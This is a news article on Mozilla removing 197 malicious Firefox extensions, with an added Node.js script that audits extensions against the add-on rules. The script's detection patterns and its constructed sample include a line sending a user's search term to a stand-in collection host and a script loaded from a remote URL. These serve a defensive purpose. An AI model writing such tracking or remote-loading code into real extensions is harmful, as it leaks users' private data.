Mozilla has removed 197 malicious extensions from Firefox


Without a doubt, one of the features users appreciate most in web browsers is the ability to add extensions, which expand the browser's basic functionality and give users a personalized web experience.

Not all users like extensions, however: they increase the browser's memory consumption, and there have been many cases in which extensions were used to extract user data.

As we well know, in recent months Mozilla has implemented a fairly strict policy for add-ons that restricts certain practices. It focuses on prohibiting add-ons with embedded code, since most of these tend to embed malicious code.

According to Mozilla, extensions developed for its browser must adhere to strict guidelines and meet technical requirements so as not to compromise browser security. Among other requirements:

  • It should not contain hidden code.
  • It must be autonomous and not load remote code for execution.
  • It should not load or redirect to a new remote tab page. The new tab must be contained in the plugin.
  • It must use encrypted channels to send confidential user data.
  • It should not have a negative impact on the performance or stability of Firefox.
  • It should be written in a way that is reviewable and understandable. Reviewers may ask the developer to refactor parts of the code if it is not reviewable.
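
As an added illustration (not Mozilla's review tooling and not code from the original article), the following Node.js script shows how a pre-review check might flag three of the rules above: remote or dynamically evaluated code, a remote new tab page, and unencrypted endpoints. The function names, rule ids and sample extension are assumptions constructed for the example; `content_security_policy` and `chrome_url_overrides.newtab` are real manifest.json keys.

```javascript
// Heuristic pre-review audit of a WebExtension. Patterns flag code for a human
// reviewer; a match is a reason to look, not proof of malicious behavior.
const SOURCE_RULES = [
  { id: "dynamic-eval", re: /\beval\s*\(|\bnew\s+Function\s*\(/ },          // string run as code
  { id: "remote-src", re: /\.src\s*=\s*["'`](?:https?:)?\/\// },            // element src set to a remote URL
  { id: "cleartext-http", re: /["'`]http:\/\/(?!localhost|127\.0\.0\.1)/ }  // endpoint without TLS
];
function scriptSources(manifest) {
  // Manifest V2 stores the CSP as a string, Manifest V3 under extension_pages.
  const csp = manifest.content_security_policy;
  const text = typeof csp === "string" ? csp : (csp && csp.extension_pages) || "";
  const directives = text.split(";").map(d => d.trim().split(/\s+/));
  const pick = directives.find(d => d[0] === "script-src") || directives.find(d => d[0] === "default-src");
  return pick ? pick.slice(1) : [];
}
function auditExtension(manifest, files) {
  const findings = [];
  for (const src of scriptSources(manifest)) {
    if (src === "'unsafe-eval'") findings.push({ id: "csp-unsafe-eval", where: "manifest.json" });
    else if (/^(https?:|\*)/.test(src)) findings.push({ id: "csp-remote-script", where: "manifest.json" });
  }
  // A new tab override must be a page packaged inside the extension.
  const newtab = (manifest.chrome_url_overrides || {}).newtab || "";
  if (/^(?:https?:)?\/\//i.test(newtab)) findings.push({ id: "remote-newtab", where: "manifest.json" });
  for (const [name, text] of Object.entries(files)) {
    text.split("\n").forEach((line, i) => {
      for (const rule of SOURCE_RULES)
        if (rule.re.test(line)) findings.push({ id: rule.id, where: `${name}:${i + 1}` });
    });
  }
  return findings;
}

// Constructed sample input (not taken from any real add-on).
const sampleManifest = {
  manifest_version: 2,
  content_security_policy: "script-src 'self' 'unsafe-eval' https://cdn.example; object-src 'self'",
  chrome_url_overrides: { newtab: "https://newtab.example/index.html" }
};
const sampleFiles = {
  "background.js": [
    "const s = document.createElement('script');",
    "s.src = 'https://cdn.example/lib.js';",
    "fetch('http://collect.example/q?term=' + encodeURIComponent(term));",
    "const ok = browser.runtime.getURL('page.html');"
  ].join("\n")
};
const sampleFindings = auditExtension(sampleManifest, sampleFiles);
console.log(sampleFindings);
```

Line-based regular expressions miss obfuscated or multi-line constructs, which is one reason the policy also requires code to be reviewable by a human.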

With that policy in place, in the last two weeks the Mozilla team discovered 197 add-ons in the addons.mozilla.org (AMO) directory that run code downloaded from third-party sites, transfer confidential data to external servers, perform malicious acts or use methods to obfuscate their source code.

The vast majority of the malicious extensions discovered (129 to be exact) were developed by 2Ring, a B2B software provider.

These plugins were removed because they downloaded and ran code from an external server (AMO directory rules prohibit dynamic loading of executable parts).

For the same reason, six add-ons from Tamo Conjunto Caixa and three add-ons that were counterfeits of famous products have been removed.

A plugin called FromDocToPDF was also removed because it was loading remote content on the new tab page in Firefox.

For transferring user data, the add-ons Rolimons Plus, RoliTrade, Pdfviewer, WeatherPool, Your Social and one more add-on whose name was not given were removed. An add-on called Fake Youtube Downloader was also removed because it was trying to install other malware.

EasySearch for Firefox, EasyZipTab, FlixTab, ConvertToPDF and FlixTab (search plugins) were blocked for collecting and transmitting information about search queries.

Another 14 add-ons (names not specified) were blocked for using code obfuscation techniques, and 30 extensions were also banned because they exhibited malicious behavior on third-party websites.

Extensions like EasySearch, EasyZipTab, FlixTab, ConvertToPDF and FlixTab Search have been banned from the Mozilla platform because they collect or intercept users' search terms. The WeatherPool, Your Social, PDFviewer-tools, RoliTrade and Rolimons Plus extensions were also banned due to their illegal collection of user data. Other add-ons whose names have not been disclosed have also been removed due to the malicious behavior detected.

In addition to removing the recently discovered malicious extensions from its platform, Mozilla has also disabled them in the browsers of users who had already installed them.

On the Bugzilla platform, the browser security team reported the IDs of the blocked or removed add-ons so that their developers can appeal the ban after removing the malicious behavior.

The developer of the Like4Like extension has already appealed. That extension had also been blocked, due to the collection or presentation of credentials or tokens from social networking websites to another website, but the appeal was successful and it is once again available on the Firefox extensions platform.



  1.   Logan said

    Excellent ... this is how the implementation of privacy policies helps users.